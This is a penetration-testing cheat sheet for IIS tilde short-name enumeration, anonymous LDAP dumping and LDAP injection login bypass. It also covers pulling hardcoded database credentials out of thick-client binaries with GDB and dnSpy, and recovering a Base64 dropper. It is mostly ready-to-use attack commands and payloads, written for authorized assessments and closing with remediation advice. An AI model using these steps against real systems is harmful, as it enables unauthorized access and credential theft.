🛡️ Methodology Checklist
- IIS tilde enumeration:
java -jar iis_shortname_scanner.jar 2 20 http://[TARGET]/ - Confirm 8.3 filenames with 404 vs 400 response difference
- LDAP injection: test auth fields with
*)(&payloads - LDAP dump if injectable: extract user objects
- Thick client: capture traffic with Burp/Wireshark (set as proxy)
- Check for hardcoded credentials in thick client config files
- Decompile if .NET: dnSpy; if Java: JD-GUI
🎯 Operational Context
Use when: IIS web server identified, LDAP exposed, or thick client application being assessed — exploit IIS tilde enumeration, anonymous LDAP bind, or thick client traffic interception.
Think Dumber First: IIS tilde: curl http://[TARGET]/~1/ returns 404 if no short names, 400 if tilde enumeration works. Anonymous LDAP: ldapsearch -x -H ldap://[TARGET] -b '' -s base — if it works, enumerate everything. Thick client: route through Burp.
Skip when: IIS is 8.0+ with tilde fix applied (post-2012 patch).
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
java -jar iis_shortname_scanner.jar 0 5 http://[TARGET_IP]/ | IIS 8.3 tilde enumeration — find hidden file/dir prefixes |
egrep -r ^[PREFIX] /usr/share/wordlists/* | sed 's/^[^:]*://' > /tmp/filtered.txt | Build wordlist from discovered prefix |
gobuster dir -u http://[TARGET_IP]/ -w /tmp/filtered.txt -x .aspx,.asp | Fuzz full filename from prefix |
nmap -p 389,636,3268 -sC -sV --open [TARGET_IP] | Scan LDAP ports (389=cleartext, 636=LDAPS, 3268=AD GC) |
ldapsearch -H ldap://[TARGET_IP] -x -b "dc=[DOMAIN],dc=com" "(mail=user@domain.com)" | LDAP anonymous bind enumeration |
ldapsearch -H ldap://[TARGET_IP]:389 -x -b "dc=[DOMAIN],dc=com" "*" | Dump all LDAP objects (anon bind) |
Username: * Password: * in login form | LDAP injection wildcard auth bypass |
gdb ./[BINARY] → set disassembly-flavor intel → disas main → b *(main+[OFFSET]) → run → x/s $rdx | GDB breakpoint to catch ELF connection string in RDX |
strings -e l [FILE].dll | Find UTF-16LE strings in .NET DLL |
Get-ChildItem -Path C:\ -Filter "[FILE].dll" -Recurse -ErrorAction SilentlyContinue | Locate a target .NET DLL on disk (Windows) |
🔬 Deep Dive & Workflow
IIS Tilde (8.3) Enumeration
Affects: IIS 7.0 – 10.0 with 8.3 filenames enabled
Logic: Windows generates short names (SecretDocs → SECRET~1)
IIS reveals file existence based on ~prefix
Workflow:
1. java -jar iis_shortname_scanner.jar 0 5 http://[TARGET]/
→ Output: TRANSF~1.ASP → file starting "transf", extension .asp
2. Generate wordlist: egrep -r ^transf /usr/share/wordlists/ | sed 's/^[^:]*://' > list.txt
3. gobuster dir -u http://[TARGET]/ -w list.txt -x .asp,.aspx
Pitfalls:
- 403 after finding shortname = file exists, need full name
- Scanner hangs → edit config.xml: <acceptableDifferenceLengthBetweenResponses>-1</acceptableDifferenceLengthBetweenResponses>
- Always check both .asp and .aspx extensions
LDAP Enumeration & Injection
# Anonymous bind dump
ldapsearch -H ldap://[TARGET_IP] -x -b "dc=[DOMAIN],dc=com" "*"
# Targeted user search
ldapsearch -H ldap://[TARGET_IP] -x -b "dc=[DOMAIN],dc=com" "(sAMAccountName=[USER])"
# Authenticated bind
ldapsearch -H ldap://[TARGET_IP] -D "cn=[USER],dc=[DOMAIN],dc=com" -w [PASS] -b "dc=[DOMAIN],dc=com" "*"Sensitive attributes to hunt: userPassword, description, notes — admins paste cleartext creds here.
LDAP injection auth bypass:
Login form: Username: * Password: *
Resulting query: (&(objectClass=user)(sAMAccountName=*)(userPassword=*))
→ Always true → bypasses auth
Injection chars: * (wildcard), ( ) (grouping), | (OR), & (AND), \ (escape)
Thick Client Credential Extraction
ELF Binary (Linux) — GDB breakpoint method:
gdb ./target_binary
gdb-peda$ set disassembly-flavor intel
gdb-peda$ disas main
# Find: call <SQLDriverConnect@plt> or similar connect function
gdb-peda$ b *(main+433) # decimal offset to the call
gdb-peda$ run
gdb-peda$ x/s $rdx # RDX = 3rd arg (connection string in Linux x64 calling convention)
# Output: "DRIVER={...};UID=sa;PWD=N0tS3cr3t!;"- PIE binaries: use
b *main+offset(not raw address, which changes) - Linux x64 calling convention: RDI (1st), RSI (2nd), RDX (3rd)
- Stack-built strings:
movabsinstructions → must break at call to see assembled string
.NET DLL (Windows) — dnSpy static analysis:
1. strings -e l target.dll (UTF-16LE for .NET)
2. Open in dnSpy → navigate Controllers → find connection string variable
3. Look for: connectionString, Password=, PWD=
ProcMon dropper capture (Windows):
1. ProcMon64 → filter: Process Name = [APP.EXE]
2. Watch for CreateFile in AppData\Local\Temp
3. Lock Temp folder: Security → disable Delete + Delete Subfolders → apply
4. Re-run app → .bat file stays
5. Remove "del" lines from .bat → run manually → decode Base64 → get binary
6. x64dbg → Options: keep only Exit Breakpoint → open binary → F9 → Memory Map
→ find RW- section ~3000 bytes → Dump Memory → drag through de4dot → open in dnSpy
Decode a captured Base64 dropper back into the binary (PowerShell):
$salida = $null; $fichero = (Get-Content [BASE64_TXT_PATH]); foreach ($linea in $fichero) { $salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("[OUTPUT_EXE_PATH]", [System.Convert]::FromBase64String($salida))Concatenates the captured Base64 lines, strips spaces, and writes the decoded bytes to an .exe — the manual step after pulling the .bat dropper out of %TEMP%.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| IIS tilde returns 404 for all | Tilde fixed or feature disabled | Confirm IIS version first; fix was patched in 2012; try on old IIS installs |
| LDAP anonymous bind fails | Anonymous bind disabled | Expected hardened config; pivot to authenticated LDAP with any domain creds |
| Thick client traffic not in Burp | Not using system proxy | Configure thick client proxy settings; or use Proxifier/ProcMon to force traffic through Burp |
| LDAP dump too large | Full domain enumeration | Filter: ldapsearch -x ... '(objectClass=user)' sAMAccountName mail for specific attributes |
| IIS enumerated paths return 404 | Short name found but file removed | Short names of deleted files may still enumerate; focus on existing enumerated paths |
📝 Reporting Trigger
Finding Title: IIS Tilde Enumeration Exposes Hidden Files and Directory Structure Impact: IIS 8.3 filename enumeration reveals short names of files and directories not accessible through normal browsing, exposing backup files, configuration files, and hidden directories that enable further exploitation. Root Cause: IIS configured to allow 8.3 short filename generation. Short names are enumerable via HTTP without authentication through the IIS tilde vulnerability. Recommendation: Disable 8.3 filename generation on IIS server volumes (fsutil 8dot3name). Apply Microsoft patch for IIS tilde vulnerability. Enumerate and verify no sensitive files are accessible via discovered paths.